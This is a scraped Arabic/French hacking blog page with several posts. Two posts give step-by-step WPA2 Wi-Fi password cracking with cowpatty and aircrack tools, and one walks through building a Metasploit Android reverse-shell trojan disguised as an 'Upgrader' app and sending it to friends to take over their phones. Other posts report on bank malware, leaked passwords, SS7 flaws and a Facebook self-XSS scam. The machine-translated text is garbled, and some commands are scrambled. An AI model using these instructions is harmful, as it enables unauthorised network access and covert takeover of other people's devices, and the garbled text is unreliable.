كيفية اختراق باسورد الويفي بالباك تراك

كجزء من سلسلة بلدي على القرصنة واي فاي المقترحة علي احد المواقع الاجنبية والتي اجتهد لانقل لكم ماطاب منها ، وأريد أن تثبت قطعة  ممتازة من قرصنة البرمجيات لتكسير كلمات السر WPA2-PSK.
في هذا البرنامج التعليمي، سوف نستخدم قطعة من البرمجيات التي وضعتها الباحثة في أمن الشبكات اللاسلكية جوشوا رايت ودعا لCowpatty (في كثير من الأحيان بأسلوب منمق كما CoWPAtty). هذا التطبيق يبسط ويسرع القاموس / هجوم ضد الهجين كلمات السر WPA2، لذلك دعونا نصل الى ذلك!

الخطوة 1: العثور على Cowpatty
Cowpatty هي واحدة من مئات القطع من البرامج التي تم تضمينها في جناح بكترك من البرمجيات. لسبب ما، لم يكن وضعها في/pentest/wireless، ولكن بدلا من ذلك تركت في /usr/local/bin، لذلك دعونا التنقل هناك.

• cd /usr/local/bin

لأن cowpatty هو في /usr/local/bin وينبغي أن يكون هذا الدليل في PATH الخاص بك، يجب أن نكون قادرين على تشغيلها من أي دليل في بكترك.

الخطوة 2: العثور على شاشة Cowpatty المساعدة
للحصول على الاختصار rundown من الخيارات cowpatty، اكتب ببساطة:

cowpatty

بكترك سوف توفر لك مساعدة الشاشة المختصرة. خذ علما بأن cowpatty يتطلب كل ما يلي.

• قائمة الكلمات
• ملف حيث تم القاء القبض password hash
• وSSID لل target AP

الخطوة 3: ضع محول لاسلكي في وضع مراقب
كما هو الحال في تكسير مع ايركراك-نغ، نحن بحاجة إلى وضع محول لاسلكي في وضع الشاشة.

airmon-ng start wlan0

الخطوة 4: بدء ملف التقاط

ونحن بحاجة للبدء في ملف التقاط حيث سيتم تخزين hashed password عندما كنا التقاطه  4-way handshake.

اذا كان السطر في الاعلي غير مفهوم انظر اليه هنا بالغة الانجليزية 

 we need to start a capture file where the hashed password will be stored when we capture the 4-way handshake.

• airodump-ng --bssid 00:25:9C:97:4F:48 -c 9 -w cowpatty mon0

هذا وسوف تبدأ تفريغ على AP المحدد (00: 25: 9C: 97: 4F: 48)، على قناة مختارة (-c 9) وحفظ تجزئة في ملف اسمه cowcrack.

خطوة 5: القبض على المصافحة Capture the Handshake
الآن عندما يتصل شخص ما إلى AP، ونحن سوف نلتقط التجزئة وسوف airdump-NG تبين لنا انه تم القاء القبض عليه في الزاوية العليا اليمنى.

خطوة 6: تشغيل Cowpatty

الآن أن لدينا تجزئة كلمة السر، فإننا يمكن استخدامه مع cowpatty وقائمة الكلمات جهدنا لكسر التجزئة.

• cowpatty -f /pentest/passwords/wordlists/darkc0de.lst -r /root/cowcrack-01.cap -s Mandela2

كما ترون في الصورة أعلاه، cowpatty يولد تجزئة من كل كلمة على لوائح الكلمات لدينا مع SSID كبذرة ومقارنتها تجزئة القبض عليه. عندما تتطابق التجزئة، فإنه dsplays كلمة مرور AP.

خطوة 7: جعل التجزئة الخاصة بك

وعلى الرغم من تشغيل cowpatty يمكن أن تكون بسيطة نوعا ما، كما يمكن أن يكون بطيئا جدا. وتجزئتهpassword hash مع SHA1 مع بذرة من SSID. وهذا يعني أن نفس كلمة المرور على معرفات مجموعة الخدمات المختلفة سوف تولد تجزئات مختلفة. هذا يمنعنا من ببساطة باستخدام جدول rainbow ضد كل نقاط وصول. Cowpatty يجب أن تأخذ في قائمة كلمات المرور التي تقدمها وحساب التجزئة مع SSID لكل كلمة. هذا هو وحدة المعالجة المركزية مكثفة جدا وبطيئة.

يدعم Cowpatty الآن باستخدام ملف التشويش المحسوبة مسبقا بدلا من ملف كلمة نص عادي، مما يجعل من تكسير كلمة السر WPA2-PSK 1000X أسرع! هي ملفات computed hash مسبقا المتاحة من كنيسة واي فاي، ويتم إنشاء هذه الملفات computed hash مسبقا باستخدام 172،000 القاموس الملف و1،000 معرفات مجموعة الخدمات الأكثر شعبية. مفيدة مثل هذا هو، إذا SSID الخاص بك ليست في ذلك 1،000، قائمة تجزئة حقا لا تساعدنا.

في هذه الحالة، نحن بحاجة لتوليد التجزئة الخاصة بنا لدينا SSID الهدف. يمكننا أن نفعل هذا باستخدام تطبيق يسمى genpmk. يمكننا توليد ملف تجزئة لدينا ل"darkcode" قائمة الكلمات لSSID "Mandela2" بكتابة:

• genpmk -f /pentest/passwords/wordlists/darkc0de.lst -d hashes -s Mandela2

خطوة 8: استخدام لدينا تجزئة

بعد أن نكون قد ولدت التجزئة لدينا لمعرفات مجموعة الخدمات معينة، يمكننا ثم كسر كلمة السر مع cowpatty بكتابة:

cowpatty -d hashfile -r -s SSID dumpfile

ترقبوا المزيد اللاسلكية دليل التقطيع

نعتذر عن بعض الاخطاء الموجودة في الموضوع ونقترح عليكم الموضوع في شكله الاصلي بالغة الانجليزية علي الرابط التالي : رابط الموضوع الاصلي

الموسوعة العلمية

2/22/2015 11:41:00 م

أكمل القراءة

How to Hack Wi-Fi: Cracking WPA2-PSK Passwords with Cowpatty

Dans le cadre de ma série sur le piratage Wi-Fi, je veux démontrer un autre excellent morceau de piratage de logiciels pour le craquage de mots de passe WPA2-PSK. Dans mon dernier post, nous  craqué WPA2 utilisant aircrack-ng . Dans ce tutoriel, nous allons utiliser un logiciel développé par le chercheur en sécurité sans fil Joshua Wright appelé  Cowpatty  (souvent stylisée que CoWPAtty). Cette application simplifie et accélère le dictionnaire / attaque hybride des mots de passe WPA2, alors allons-y à elle!

Étape 1: Trouver la Cowpatty

Cowpatty est l'une des centaines de morceaux de logiciel qui sont inclus dans la suite BackTrack de logiciels. Pour une raison quelconque, il n'a pas été placé dans la / pentest / sans fil  répertoire, mais a été laissé dans le  répertoire / usr / local / bin répertoire, alors allons-y naviguer.

cd / usr / local / bin

Parce Cowpatty est dans la  usr / local / bin /  répertoire et ce répertoire ne devrait pas être dans votre PATH, nous ne devrions pas être en mesure d'exécuter à partir de ne importe quel répertoire dans BackTrack.

Étape 2: Trouver l'écran Cowpatty Aide

Pour obtenir un bref aperçu des options cowpatty, tapez simplement:

cowpatty

BackTrack vous donner un bref écran d'aide. Prenez note que cowpatty nécessite tous les éléments suivants.

une liste de mots

un fichier où le hash du mot de passe a été capturé

le SSID de l'AP cible

Étape 3: Placez l'adaptateur sans fil en mode moniteur

Tout comme dans  la fissuration avec aircrack-ng , nous devons mettre l'adaptateur sans fil en mode moniteur.

airmon-ng start wlan0

Étape 4: Lancer un fichier de capture

Ensuite, nous devons commencer à un fichier de capture où le mot de passe haché sera enregistrée nous capturons le 4-way handshake.

airodump-ng --bssid 00: 25: 9C: 97: 4F: 48 -c 9 -w cowpatty mon0

Cela va démarrer une décharge sur l'AP sélectionné ( 00: 25: 9C: 97: 4F: 48 ), sur le canal sélectionné ( -c 9 ) et enregistrez le hachage dans un fichier nommé  Cowcrack .

Étape 5: Capture the Poignée de main

Maintenant, quand quelqu'un se connecte à l'AP, nous capturons le hachage et airdump-ng allons nous montrer qu'il a été capturé dans le coin supérieur droit.

Étape 6: Exécutez le Cowpatty

Maintenant que nous avons le hash du mot de passe, nous pouvons l'utiliser avec cowpatty et de notre liste de mots pour casser le hachage.

• cowpatty -f /pentest/passwords/wordlists/darkc0de.lst -r -s /root/cowcrack-01.cap Mandela2

Comme vous pouvez le voir dans la capture d'écran ci-dessus, cowpatty génère un hachage de chaque mot sur notre liste de mots avec le SSID comme une graine et en le comparant au hachage capturé. Lorsque les hash correspondent, il dsplays le mot de passe de l'AP.

Étape 7: Faites votre propre Hash

Bien que fonctionnant cowpatty peut être assez simple, il peut aussi être très lent. Le mot de passe est haché avec hachage SHA1 avec une graine du SSID. Cela signifie que le même mot de passe sur différents SSID va générer différents hachages. Cela nous empêche de simplement en utilisant une table arc contre tous les points d'accès. Cowpatty doit prendre la liste de mot de passe que vous fournissez et calculer le hachage avec le SSID pour chaque mot. Ce est beaucoup de temps CPU et lent.

Cowpatty prend désormais en utilisant un fichier pré-calculé hachage plutôt qu'un fichier de texte en texte brut, ce qui rend le craquage du mot de passe WPA2-PSK 1000x plus rapide! Fichiers de hachage calculées pré sont disponibles auprès de l'  Eglise du WiFi , et ces fichiers pré-calculées hachage sont générées en utilisant 172000 fichier de dictionnaire et les 1000 SSID plus populaires. Aussi utile que ce est, si votre SSID est pas dans ce 1000, la liste de hachage vraiment ne nous aide pas.

Dans ce cas, nous devons générer nos propres tables de hachage pour notre SSID cible. Nous pouvons le faire en utilisant une application appelée  Genpmk . Nous pouvons générer notre dossier de hachage pour la «darkcode" liste de mots pour le SSID "Mandela2" en tapant:

genpmk -f -d /pentest/passwords/wordlists/darkc0de.lst hachages -s Mandela2

Étape 8: Utilisation Notre Hash

Une fois que nous avons généré nos hashs des SSID particuliers, nous pouvons alors casser le mot de passe avec cowpatty en tapant:

cowpatty -d -r hashfile dumpfile -s ssid

Restez connectés pour plus Guides de piratage sans fil

الموسوعة العلمية

2/22/2015 11:37:00 م

أكمل القراءة

طريقة اختراق هواتف الاندرويد عن طريق صناعة تطبيق بالكالي لينيكس

مرحبا بكم في هذه المشاركة : هذا هو البرنامج التعليمي شرح كيفية إختراق هواتف الاندرويد مع كالي.
 لا توجد دروس تفسير هذا الاختراق / استغلال، لذلك، أنا قدمت واحدة. (ومع ذلك، قد تعرف بالفعل عن هذا) وهو منقول عن احد المواقع الاجنبية بطريقة خاصة وبتعبير خاص من اعدادي كما انني لم اجربه حتي الان وساضع رابط شرح الطريقة بالغة الام لتفادي الاخطاء كما ارجوا عدم استخدام الاطريقة لاغراض ظارة هذا ان كانت صحيحة 
الخطوة الاولي
فتح معبر او محطة terminal، وصنع تورجان .apk
ثم نكتب الامر التالي مع تغير LHOST بال ip الخاص بنا
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk

يمكنك أيضا الإختراق الروبوت على WAN i.e. من خلال استخدام الشبكة الخاص بك ومشاركته مع العامة / IP الخارجي في LHOST واعادة توجيه منفذ 

خطوة 2: فتح محطة أخرى:

تفعيل metasploit console، بكتابة: msfconsole

الخطوة 3: انشاء مستمع:

بعد القيام بالتحميل (الامر سيستغرق وقتا)، نحمل معالج متعدد للاختراق وذلك بكتابة: use exploit/multi/handler

انشاء  reverse payload بكتابة: set payload android/meterpreter/reverse_tcp

لتعيين L نوع المضيف:  set LHOST 192.168.0.4 حتي وان كان الاختراق علي شبكتك

الخطوة 4: استغلال!
في نوع آخر: استغلال لبدء المستمع.
نسخ التطبيق الذي قمت به (Upgrader.apk) من المجلد الاصلي الي هاتفك الاندرويد .



ثم إرساله باستخدام تحميلها على دروببوكس أو أي موقع تقاسم (مثل: www.speedyshare.com).
ثم إرسال رابط الموقع أن أعطى لك إلى أصدقائك واستغلال هواتفهم (فقط على LAN، ولكن إذا كنت تستخدم طريقة WAN ثم يمكنك استخدام استغلال أي مكان على الإنترنت)

السماح للضحية بتثبيت التطبيق Upgrader (كما قد يعتقد أنها تهدف إلى رفع مستوى بعض الميزات على هاتفه)
ومع ذلك، ينبغي تمكين خيار مخصص لتركيب التطبيقات من مصادر غير معروفة (إن لم يكن) من إعدادات الأمان من هاتف الاندرويد للسماح بثبيت التورجان .
وعندما ينقر المفتوح ...
خطوة 5: BOOM!
هنا يأتي موجه meterpreter



وفي الاخير تكون قد اتمت جميع العمليات ومبروك عليك الاختراق

الموسوعة العلمية

2/17/2015 02:08:00 ص

أكمل القراءة

افظل تطبيق لايجاد باسورد الويفي (مجرب وفعال)

السلام عليكم 

طريقة ايجاد باسورد الويفي عن طريق تطبيق wifi map 

في موضوع اليوم سنتطرق واياكم الي تطبيق رائع علي هواتف التي تعمل بنظام الاندرويد و الابس ستورن وهو تطبيق رائع يساعد في فك باسورد الويفي  حتي دون اللجوء الي الاختراق واستعمال كالي او باك تراك او اي نظام مساعد في الاختراق وبطريقة قانونية وهذا يكفي ان تتوفر علي هاتف ذكي من النسخ الحديثة لان التطبيق لا يعمل علي الانظمة القديمة 

لقد جربت التطبيق بنفسي علي واشغل معي وتمكنت من تووفر علي مجموعة من البسواردات الخاصة بسكان الحي الذي اعيش فيه وهو بالفعل يعمل 

وطريقة العمل علي التطبيق هي بان تشغل الويفي في جهازك وتشغل الGPS لتحديد المواقع او يمكنك تشغيل اداة مرور البيانات ثم تدخل الي التطبيق وتظغط علي رمز السهم لتحديد موقعك ومن هناك سيخبرك عن كل نقاط الويفي القريبة منك تظغط عليها لتجد الباسورد مكتوب

  يمكنك تحميل التطبيق من رابط التالي  wifi map

الموسوعة العلمية

2/16/2015 08:26:00 م

أكمل القراءة

قراصنة التكنولوجيا الفائقة سرقة -300 ملايين دولار من 100 من البنوك

في نهاية هذا الاسبوع، نشرت صحيفة نيويورك تايمز تفاصيل حملة جنائية التكنولوجيا الفائقة والتي شهدت البنوك في روسيا، واليابان، وأوروبا والولايات المتحدة تعرضت لهجوم كبير البرمجيات الخبيثة وسرقة الملايين من الدولارات.
القصة، التي انبثقت عن تقرير كاسبرسكي التي كانت مشتركة مع صحيفة قبل نشره رسميا، تلقى طبيعي انتباه الآخرين في وسائل الإعلام:

وقال كاسبرسكي كريس دوجيت صحيفة نيويورك تايمز أن الهجوم - الذي تمارسه عصابة ما يسمى ب "Carbanak"  "من المرجح انه الهجوم الأكثر تطورا الذي شهده العالم حتى الآن من حيث التكتيكات والأساليب التي استخدمت من المجرمين الإلكترونيين علي أن تبقى سرية. "
في ديسمبر، وصفت روسيا قرصنة عصابة كيف سرقت الملايين من البنوك، واستهداف أنظمة الدفع الإلكتروني وحتى تركيب البرمجيات الخبيثة على أجهزة الصراف الآلي البنية التحتية لإدارة التي أسفرت عن سرقة من اجهزة الصراف.

العصابة كان اسمها  "Anunak" والتي تم الكشف عنها من قبل باحثين في المجموعة-IB وفوكس-IT، الذي كشف لأول مرة الحملة التي أفيد أيضا عن طريق أمثال فوربس في ذلك الوقت.
كما هو الظن عند بعض الخبراء ان  Anunak وCarbanak واحدة وهي نفس العصابة. تقرير كاسبرسكي ربما يكون قد أمسك انتباه أمثال نيويورك تايمز، ولكن الآن يبدو أن ما هو "جديد" هو فقط أن المزيد من البنوك أصيبت من قبل المتسللين من أكد في وقت سابق، والمزيد من المال سرقت

فمن العار أن صحيفة نيويورك تايمز لا تشير الي أبحاث سابقة قام بها فوكس-IT والمجموعة-IB، وبدلا من ذلك يعطي كل دائرة الضوء للباحثين في كاسبرسكي .

شيء الوحيد المؤكد. البنوك بحاجة للحفاظ على سرعة دهائهم وعلاج الأمن كأولوية عالية، كما أصبح القراصنة أكثر تطورا من أي وقت مضى والجريئة في محاولاتهم لسرقة النقدية.

الموسوعة العلمية

2/15/2015 09:52:00 م

أكمل القراءة

4 كتب للتوسع في مجال الامن المعلوماتي و الاختراق

ان تكون هاكر متقدم ، هذا يعني انك هاكر دارس ومتمرس ، الاشخاص الذين لم يدرسوا كتبا ولم يمارسوا ماتعلموه ، هاؤلاء الاشخاص لايمكن ان يصطلح عليهم هاكرز ، بل ولهم عدة تصنيفات اخرى حددها لهم العالم الاسود والتي تتماشى مع "مهاراتهم المكتسبة " . 

ومادام ان الإختراق والحماية يلزمها منهج علمي من اجل إحترافها ، فلابد عليك عزيزي القارئ على الاقل ان تدرس بعض الكتب والتي ستنقلك رويضا رويضا من البداية و إلى الإحتراف . لهذا إخترت لك في هذه التدوينة مجموعة متنوعة من الكتب والتي رتبتها من مستوى المبتدئين وإلى مستوى المحترفين . 

الكتاب الاول : Hacking for Dummies

أنصحك بهذا الكتاب كأول كتاب تدرسه ، ذلك لأنه ينتقل معك من الــ 0 كما انه سيساعدك في بناء مهاراتك الخاصة ومنحك اسلوبا ممنهجا في فهم إستراتيجيات كشف الثغرات الامنية وكذلك التبليغ عنها . هذا الكتاب سيجعلك قادر على فهم اساليب الهندسة الإجتماعية وكذلك طرق الحماية منها . الكتاب يوجد منه نسخ باللغة الفرنسية وهي : Le piratage pour les nuls

الكتاب الثاني : Unrevealed Secrets of Hacking and Cracking PB

بعد إنتهائك من قراءة الكتاب الاول ، انصحك بهذا الكتاب فهو سيقربك اكثر من ادوات الإختراق وكذلك المشاريع التي تستخدم في هذا الإطار . كما انك ستتعلم مع هذا الكتاب ميتودولوجيا الإختراق ، اي المراحل التي يمكن تتبعها من اجل القيام بعملية إختراق ناجحة . 

الكتاب الثالث : Gray Hat Hacking: The Ethical Hackers Handbook

سننتقل الآن إلى الشبكات ، واتمنى انك ان تكون قد درست بعض التقنيات في هذا المجال قبل المرور إلى دراسة هذا الكتاب . ، لانه لايمكنك ان تفهم هذا الكتاب إذا لم تكن دارس للشبكات . غير ذلك فهذا الكتاب يعلمك طرق الكشف عن الثغرات الامنية في الشبكات وإختراقها ، بالإضافة كذلك إلى تعلم بعض تقنيات الــ cutting-edge .

الكتاب الرابع : Metasploit: The Penetration Tester's Guide

هذا الكتاب يقربك اكثر من المشروع العملاق Metasploit ،  فوه يعلمك كيف تتعامل مع مختلف الادوات الموجودة في هذا النظام ، كشف الثغرات الامنية وكذلك إستغلالها بإستعمال الميتاسبلويت . فهذا الكتاب يعلمك اكثر من الجانب التطبيقي ولايهتم بشكل كبير بالجانب النظري .

اتمنى منك الإهتمام بدراسة هذه الكتب ، واضرب لكم موعد مع كتب أخرى ساشارككم إياها من مكتبتي الخاصة لمن يود ان يتقدم في مجال الإختراق والحماية ، ورجاء يجب التنويه ان هذه الكتب تستلزم منك مهارات في إدارة الشبكات والانظمة وكذلك في لغات البرمجة لكي تستطيع فهم مضمون هذه الكتب . غير ذلك فالاتطلبوا مني طرح روابط تحميل لان ذلك غير قانوني لانها ليست مجانيةفي هذه التدوين ، لكن في المقابل يمكنكم البحث عنها في الانترنت فهي موجودة بالمجان . واتمنى ان اكون قد ساعدتكم في هذه التدوينة ، في إنتظار إرتساماتكم واسئلتكم .

الموسوعة العلمية

1/28/2015 11:23:00 م

أكمل القراءة

قراصنة سربوا 13،000 كلمات السر من أمازون، وول مارت وبرازرز

السلام عليكم

لقد تسربت اليوم بتاريخ 26-12-2014 مجموعة كبيرة من كلمات مرور لحسابات علي مواقع الشعبية ومجمعة من ارقام بطاقات الائتمان وتواريخ نهاية الصلاحية

التسريبات جاءت من مواقع تديرها سلسلة من المواد الإباحية إلى الألعاب إلى التسوق عبر الإنترنت. 

الأمازون
وول مارت
شبكة بلاي ستيشن
إكس بوكس ​​لايف
Twitch.tv
ديل
برازرز
DigitalPlayground
ونرى قائمة كاملة 

وكانت في شكل وثائق كبيرة وضعت علي مواقع تبادل المعلومات 

لمجرد أن يكون على الجانب أكثر أمانا، وينصح المستخدمين لتغيير كلمات المرور الخاصة بهم إذا كان لديهم حسابات على هذه المواقع للخطر، وكذلكإيلاء الاهتمام لمعاملات بطاقات الائتمان الخاصة بك ، وإذا وجدت أي نشاط مشبوه، والتواصل مباشرة مع البنوك والمؤسسات المالية ذات الصلة.

أيضا، لا تستخدم نفس كلمة السر للأعمال المصرفية ومواقع التسوق عبر الانترنت، ودائما ترقب للأنشطة غير عادية أو شراء غير مصرح بها مع حساباتك.

الموسوعة العلمية

12/27/2014 08:49:00 م

أكمل القراءة

القراصنة يمكنهم قراءة SMS الخاصة والاستماع إلى المكالمات الهاتفية

وقد اكتشف باحثوا الأمن ثغرة أمنية واسعة النطاق التي قد تسمح للقراصنة والمجرمين الإلكترونيين الاستماع إلى المكالمات الهاتفية الخاصة وقراءة الرسائل النصية على نطاق واسع يحتمل أن تكون - لا يهم إذا تستخدم الشبكات الخلوية أحدث والأكثر تقدما التشفير المتوفرة.
الخلل الحاسم يكمن في شبكة الاتصالات العالمية المعروفة باسم إشارة النظام 7 أن ناقلات قوى متعددة الهاتف في جميع أنحاء العالم، بما في ذلك AT & T وفيريزون، لتوجيه المكالمات والنصوص وغيرها من الخدمات لبعضها البعض. وقد تم اكتشاف الضعف من قبل الباحثين الألمان الذين قدمو النتائج التي توصلوا إليها في مؤتمر القراصنة في هامبورغ في وقت لاحق من هذا الشهر.
"ويقول الخبراء انه من الواضح بشكل متزايد أن SS7، والمصممة لأول مرة في 1980s، ومليئة نقاط الضعف الخطيرة التي تقوض الخصوصية المليارات في العالم من العملاء الخلوي،" قالت صحيفة واشنطن بوست، التي كشفت لأول مرة العيوب في النظام في وقت سابق من هذا العام.
رقم ثغرات أمنية في SS7
SS7 أو نظام الإشارات عدد 7 هو مجموعة بروتوكولات المستخدمة من قبل معظم مشغلي الاتصالات في جميع أنحاء العالم على التواصل مع بعضها البعض عند توجيه المكالمات والنصوص والبيانات الإنترنت. انها تسمح شركات الهاتف الخليوي لجمع معلومات الموقع من أبراج الهاتف الخليوي وتقاسمها مع بعضها البعض. وهناك حاملة الولايات المتحدة تجد عملائها، بغض النظر عن ما اذا كان الشخص يسافر إلى أي بلد آخر.
ووفقا للباحثين الأمن والبنية التحتية التي عفا عليها الزمن من SS7 يجعل من السهل جدا للقراصنة الإختراق، كما يتم تحميله مع بعض الثغرات الأمنية الخطيرة التي يمكن أن يؤدي إلى غزوات كبيرة من الخصوصية من المليارات من العملاء الخلوية في جميع أنحاء العالم.
"إن العيوب التي اكتشفها الباحثون الألمان هي في الواقع وظائف في صلب SS7 لأغراض أخرى - مثل حفظ المكالمات إتصال كمستخدمين تسريع أسفل الطرق السريعة، والتحول من برج الخلية إلى خلية برج - أن المتسللين يمكن [ربوربوس للمراقبة بسبب تراخي الامن على شبكة "جاء في التقرير.
مستتر تفتح ذراعيها للHACKERS
وحتى الآن، لم يتم كشف مدى العيوب استغلالها من قبل قراصنة الكمبيوتر، ولكن يعتقد أن استخدام المتسللين العيوب يمكن تحديد موقع أو إعادة توجيه المكالمات المستخدمين لأنفسهم أو في أي مكان في العالم قبل إحالتها إلى المتلقي المقصود، والاستماع إلى المكالمات لأنها يحدث، وتسجيل مئات المكالمات المشفرة والنصوص في وقت لاحق فك التشفير.
مهما التشفير القوي أو المتقدمة شركات الطيران التي تستخدم، على سبيل المثال AT & T وفيريزون استخدام شبكات الجيل الثالث 3G و 4G للمكالمات والرسائل والنصوص المرسلة من الناس داخل نفس الشبكة، ولكن استخدام تلك SS7 القديم وانعدام الأمن لإرسال البيانات عبر الشبكات الباب الخلفي مفتوحا للقراصنة.
ليس فقط هذا، واستخدام بروتوكول SS7 أيضا يجعل من إمكانية للاحتيال على المستخدمين وناقلات الخلوية، وفقا للباحثين.
اتحاد الحريات المدنية - التوقف عن استخدام الخدمة الهاتفية، ولكن الانتظار !! هل هذا ممكن؟
وقد حذر اتحاد الحريات المدنية الأمريكية (أكلو) أيضا الناس من استخدام هواتفهم في ضوء الانتهاكات.
"لا تستخدم خدمة الهاتف التي تقدمها الشركة الهاتف للصوت، وقناة صوت أنها توفر غير آمن"، وقال تقني المبدأ كريستوفر Soghoian جزمودو. "إذا كنت ترغب في إجراء مكالمات هاتفية لأحبائهم أو الزملاء وتريد لها أن تكون آمنة، واستخدام أدوات خارجية. يمكنك استخدام فيس تايم، الذي هو في صلب أي فون، أو الإشارة، والتي يمكنك تحميلها من المتجر . تسمح هذه يجب أن يكون اتصال آمن على قناة غير آمنة ".
ويعتقد Soghoian أيضا أن الأجهزة الأمنية - مثل وكالة الأمن القومي للولايات المتحدة وكالة الامن البريطانية GCHQ - يمكن أن يكون استخدام هذه العيوب. "العديد من وكالات الاستخبارات كبيرة ربما يكون الفرق التي لا تفعل شيئا ولكن الأبحاث SS7 والاستغلال. لقد المرجح جلس على هذه الأمور واستغلال بهدوء عليهم".
ومع ذلك، لا يتم إخفاء القدرات الأمنية السيئة للبروتوكول SS7 من الشعب وليس لها في كل جديد، قبل ثلاثة أشهر فقط أبلغنا كيف يمكن لالهاتف الخليوي العضو يمكن تتبع سرا جميع أنحاء العالم. لكن عصر حيث كل شخص يهتم الخصوصية وأمن البيانات الخاصة بهم، مثل هذه الامور بالدعاية حقا بالضبط كيف كبيرة هذا التهديد هو حقا وجعل العديد من قلق من عواقبه.

الموسوعة العلمية

12/19/2014 04:00:00 م

أكمل القراءة

Facebook auto-XSS Scam Fools utilisateurs en eux-mêmes Hacking

Les escrocs ont de nouveau ciblé plus d'un milliard d'utilisateurs actifs de la populaire réseau social Facebook géant, pour infecter autant de victimes que possible.

Non en servant de faux poste, ni en fournissant lien vidéo illicite, à la place cette fois escrocs ont utilisé une nouvelle façon de tromper les utilisateurs de Facebook en injectant ou en plaçant le code JavaScript côté client malveillant ou dans leurs navigateurs Web.

Ce code malicieux pourrait permettre à un attaquant d'accéder aux victimes de comptes, utilisant ainsi pour fraude, pour envoyer des spams, et de promouvoir de nouvelles attaques en affichant l'arnaque sur le calendrier aux victimes de les amis. Cette technique est connue sous le nom Cross-site Scripting ou Self Self XSS.

Auto-XSS (Auto Cross-Site Scripting) escroquerie est une combinaison de l'ingénierie sociale et un navigateur vulnérabilité , essentiellement conçu pour tromper les utilisateurs Facebook »en donnant accès à leur compte. Une fois qu'un attaquant ou escroc obtient l'accès aux utilisateurs de Facebook compte, ils peuvent même poster et commenter sur les choses sur les utilisateurs de son nom.

Afin d'infecter utilisateur de Facebook, le cyber escrocs envoyer un phishing message via un email ou d'un poste de Facebook d'un des amis dans la liste de la victime ciblée affirmant, dans ce cas, un moyen de pirater ne importe quel utilisateur Facebook en suivant quelques simples étapes.

L'escroquerie posté se présente comme suit:

Hack ne importe quel compte Facebook en suivant ces étapes:

1. Aller au profil de la victime

2 . Cliquez clic droit puis cliquez sur inspecter élément et cliquez sur l'onglet "Console".

3.Collez le code dans la case en bas et appuyez sur Entrée

Le code est dans le site web: http: // textuploader .com **** /

Bonne chance: *

Ne pas mal à personne ...

Ils veulent que vous suivez les instructions données en copiant collant le code malveillant, comme indiqué dans les instructions ci-dessus, pour prendre sur le compte de quelqu'un d'autre. L'astuce est adapté pour les utilisateurs de Google Chrome et Mozilla Firefox.

Facebook auto-XSS Scam Fools utilisateurs en eux-mêmes Hacking

Une fois que vous auto-injecter ce script malveillant à votre compte, il va donner l'accès de votre compte entier à celui qui pourrait faire une variété d'activités malveillantes, propagation essentiellement toutes sortes de campagnes malveillantes. Les pirates peuvent également infecter l'ordinateur de la victime par des logiciels malveillants qui peuvent recueillir des détails bancaires et les envoyer à un emplacement distant contrôlé par eux.

Facebook a également inscrit l'arnaque sur la liste des menaces à ses utilisateurs ont été observés à tomber victime. " Les fraudeurs qui utilisent auto-XSS vous tromper généralement en promettant de vous aider à pirater le compte de quelqu'un d'autre » , lit le message . " L'objectif de l'escroc est de vous amener à exécuter leur code malveillant sur ​​votre ordinateur. Lorsque vous exécutez le code, vous accordez l'accès escroc à votre compte pour fraude, spam, et incitant plus de personnes dans l'exécution de l'escroquerie. "

Repérer ces escroqueries et les rapports entre eux sont la meilleure façon de vous protéger, mais si vous êtes victime d'une de ces attaques, ne paniquez pas! Suivez le lien pour en savoir plus sur la protection de votre compte Facebook .

Facebook travaille également avec différents éditeurs de navigateurs pour ajouter une protection dans le navigateur dans un effort pour éviter ce vecteur d'être exploités.

الموسوعة العلمية

12/18/2014 11:32:00 م

أكمل القراءة